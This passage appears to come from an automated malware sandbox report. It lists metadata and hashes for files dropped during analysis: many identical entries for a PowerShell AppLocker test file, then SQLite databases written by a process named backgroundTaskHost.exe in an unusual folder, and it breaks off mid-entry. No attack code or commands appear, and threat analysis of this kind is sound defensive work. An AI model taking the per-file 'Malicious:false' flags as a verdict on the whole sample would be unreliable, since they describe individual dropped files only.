                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
